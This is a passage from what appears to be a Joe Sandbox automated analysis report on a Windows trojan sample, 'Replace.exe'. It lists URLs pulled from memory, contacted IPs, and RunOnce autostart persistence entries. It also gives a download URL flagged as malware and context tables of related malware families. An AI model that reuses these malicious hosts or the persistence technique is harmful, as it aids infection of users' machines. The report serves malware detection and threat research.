                                                                              https://nodejs.org/node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                		high
                                                                                https://tools.ietf.org/html/rfc7540#section-8.1.2.5node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                  		high
                                                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                    		high
                                                                                    https://wwww.certigna.fr/autorites/0mnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digitsnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                      		high
                                                                                      http://www.squid-cache.org/Doc/config/half_closed_clients/node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                        		high
                                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                          		high
                                                                                          https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetternode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                            		high
                                                                                            https://stackoverflow.com/a/5501711/3561node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                		high
                                                                                                http://narwhaljs.org)node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		low
                                                                                                https://www.ecma-international.org/ecma-262/#sec-promise.allnode.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                  		high
                                                                                                  https://files.nflxso.ca/downloads/winapp/latest-installer.exe3rundll32.exe, 00000007.00000002.2229301918.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://support.image-line.com/action/redirect/FLStudioAuthentication?username=%s&password=%s&flags=run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://code.google.com/p/chromium/issues/detail?id=25916node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.securetrust.com/STCA.crlnode.exe, 0000000F.00000002.2921222937.0000000001FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.accv.es/legislacion_c.htmICATE-----Fnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.cert.fnmt.es/dpcs/node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gznode.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/nodejs/node/pull/12607node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.image-line.com/redirect/merun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlnode.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.accv.es00node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.ecma-international.org/ecma-262/#sec-line-terminatorsnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://api.soundcloud.com/connectrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://files.nflxso.ca/downloads/winapp/latest-installer.exe-rundll32.exe, 0000000A.00000003.2261300042.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2284164999.0000000002E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-Patternnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://nodejs.org/download/release/tnode.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://html4/loose.dtdnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		low
                                                                                                                            https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzknode.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://sourcemaps.info/spec.htmlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://support.image-line.com/member/regcode.php?inapp=1UHrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://nodejs.org/download/release/v12.22.12/win-x86/node.libLynode.exe, 0000000F.00000003.2238553183.0000000032CA2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://invisible-island.net/xterm/ctlseqs/ctlseqs.htmlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/nodejs/node/pull/12342node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://bugs.chromium.org/p/v8/issues/detail?id=6593node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.unicode.org/copyright.htmlnode.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://support.image-line.com/api.php?call=product_description_inapp&callback=il_product_descriptiorun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.firmaprofesional.com/cps0node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/nodejs/node/pull/34375node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtomnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://.cssnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		low
                                                                                                                                                    http://crl.securetrust.com/SGCA.crl0node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlFnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://support.image-line.com/run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://heycam.github.io/webidl/#dfn-default-iterator-objectnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://heycam.github.io/webidl/#es-iterable-entriesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzdnode.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://heycam.github.io/webidl/#es-interfacesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://support.image-line.com/redirect/FLStudio%sHelprun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.image-line.com/flstudio/callback.htmlrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaquenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-colornode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://github.com/nodejs/node/issuesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  172.67.152.151
                                                                                                                                                                  		files.nflxso.caUnited States
                                                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                                                  142.251.16.147
                                                                                                                                                                  		www.google.comUnited States
                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                  172.253.122.101
                                                                                                                                                                  		plus.l.google.comUnited States
                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                  239.255.255.250
                                                                                                                                                                  		unknownReserved
                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                  74.201.73.52
                                                                                                                                                                  		register.nflxso.caUnited States
                                                                                                                                                                  		63018DEDICATEDUSfalse
                                                                                                                                                                  172.253.62.104
                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                                                                  Private

                                                                                                                                                                  IP
                                                                                                                                                                  192.168.2.4

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                  Analysis ID:1434556
                                                                                                                                                                  Start date and time:2024-05-01 11:07:15 +02:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 9m 41s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:52
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:Replace.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@90/28@11/7
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 72.7%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                  • Number of executed functions: 205
                                                                                                                                                                  • Number of non-executed functions: 154
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.253.115.94, 142.251.163.138, 142.251.163.139, 142.251.163.113, 142.251.163.101, 142.251.163.100, 142.251.163.102, 172.253.115.84, 34.104.35.123, 172.253.62.94, 23.207.202.41, 192.229.211.108, 64.233.180.94, 172.253.62.101, 172.253.62.113, 172.253.62.102, 172.253.62.139, 172.253.62.138, 172.253.62.100
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                  • Execution Graph export aborted for target node.exe, PID 3912 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target node.exe, PID 5328 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target node.exe, PID 8296 because there are no executed function
                                                                                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  10:08:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce InetHelper "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                  10:09:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce InetHelper "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                  11:08:04API Interceptor3x Sleep call for process: rundll32.exe modified
                                                                                                                                                                  11:08:53API Interceptor10x Sleep call for process: WMIC.exe modified

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  239.255.255.250https://www.allemania.ro/xbegtx/?77562981Get hashmaliciousUnknownBrowse
                                                                                                                                                                    SecuriteInfo.com.Win32.Evo-gen.14997.5526.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        bad.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                          https://thaksaubie.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            24314_DellFW_UPGRADE_DOCK_UTILITY_v1.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              https://u44194017.ct.sendgrid.net/ls/click?upn=u001.DFVMuW4-2FEZd5YVb67fax3vlta-2FCThF5DL5AiBOKSuCQ0EGblKsjjwZ6OyBnFJ1r0moLWoXz-2FxMe7b-2Fl8d95-2BzQZm5sEfp0OhOo7B3jcXBv-2BgE3OtXGpSU6X45OZo1Nrxk2IftEiMrIOyVB56ojuhdoJljt5g2SSHyY7oPkJJgIc8WZfAGQwKIBDDb5RgJUJQ66qTgciuugoqvdSYhCxYJC1tgX93eAUNOEu10Nm7b0U-3DknVp_7tKkve0pPj06aVCwrllSgRRNXKtXxcU59nMcisLNciFJdA-2BcFyVeCwSnhI-2BRdQ1qFfxu7tK4pt-2FudMGWFIdmDbcopC0QM1U4rVigQkZdCnBEZMNAr3v7VDeciiUe7Q0Ot-2FxmcDN99buzfdPKtuJBA-2BhqOF-2BxjX9XlNsaEZDFjTkWHyxaBFOX5Dme9fmey6KiIaeINCkVXw-2Bxc1n6NEs1rw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                  171454686603a18a555a7edce5c88a8af9597443cf22f96b4668e6805cbdd7fb34b4026c9d600.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      74.201.73.52file.exeGet hashmaliciousGlupteba, GuLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousFabookieBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousFabookie, Glupteba, StealcBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousHTMLPhisher, Fabookie, Glupteba, GuLoader, StealcBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousHTMLPhisher, Fabookie, Glupteba, StealcBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousHTMLPhisher, Fabookie, GuLoader, Stealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousHTMLPhisher, Fabookie, Glupteba, StealcBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousGlupteba, Socks5Systemz, VidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousGlupteba, Socks5Systemz, VidarBrowse
                                                                                                                                                                                                        Syutqxpe7O.exeGet hashmaliciousGlupteba, VidarBrowse

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          CLOUDFLARENETUShttps://www.allemania.ro/xbegtx/?77562981Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                                          https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 104.21.91.248
                                                                                                                                                                                                          AUv7vVtT8i.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                          • 104.21.13.124
                                                                                                                                                                                                          https://thaksaubie.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.2.253
                                                                                                                                                                                                          24314_DellFW_UPGRADE_DOCK_UTILITY_v1.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                                          QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                          • 104.21.84.67
                                                                                                                                                                                                          attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                          GENERALCANDY INV FWDRB42024.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                          • 172.67.134.136
                                                                                                                                                                                                          citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.206.230
                                                                                                                                                                                                          VOrqSh1Fts.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                                                                                                                                                                                          • 104.21.4.208
                                                                                                                                                                                                          DEDICATEDUSx1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 200.220.163.225
                                                                                                                                                                                                          0FnrrE8B6Y.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 168.81.61.232
                                                                                                                                                                                                          D2M15lCoQK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 45.74.57.45
                                                                                                                                                                                                          CGlwOBF2cH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 45.74.57.32
                                                                                                                                                                                                          SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                          • 64.42.181.227
                                                                                                                                                                                                          VlkShT2TjD.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                          • 172.83.131.72
                                                                                                                                                                                                          Enrollment PO, from United Way of the Midlands.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 216.105.168.10
                                                                                                                                                                                                          9Dcya2QOaQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 14.1.28.237
                                                                                                                                                                                                          file.exeGet hashmaliciousGlupteba, GuLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                          • 74.201.73.52
                                                                                                                                                                                                          file.exeGet hashmaliciousFabookieBrowse
                                                                                                                                                                                                          • 74.201.73.52

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          28a2c9bd18a11de089ef85a160da29e4SecuriteInfo.com.Win32.Evo-gen.14997.5526.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          bad.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          https://thaksaubie.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          171454686603a18a555a7edce5c88a8af9597443cf22f96b4668e6805cbdd7fb34b4026c9d600.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.221.242.90
                                                                                                                                                                                                          • 13.85.23.86
                                                                                                                                                                                                          http://www.babeleye.comGet hashmaliciousUnknownBrowse
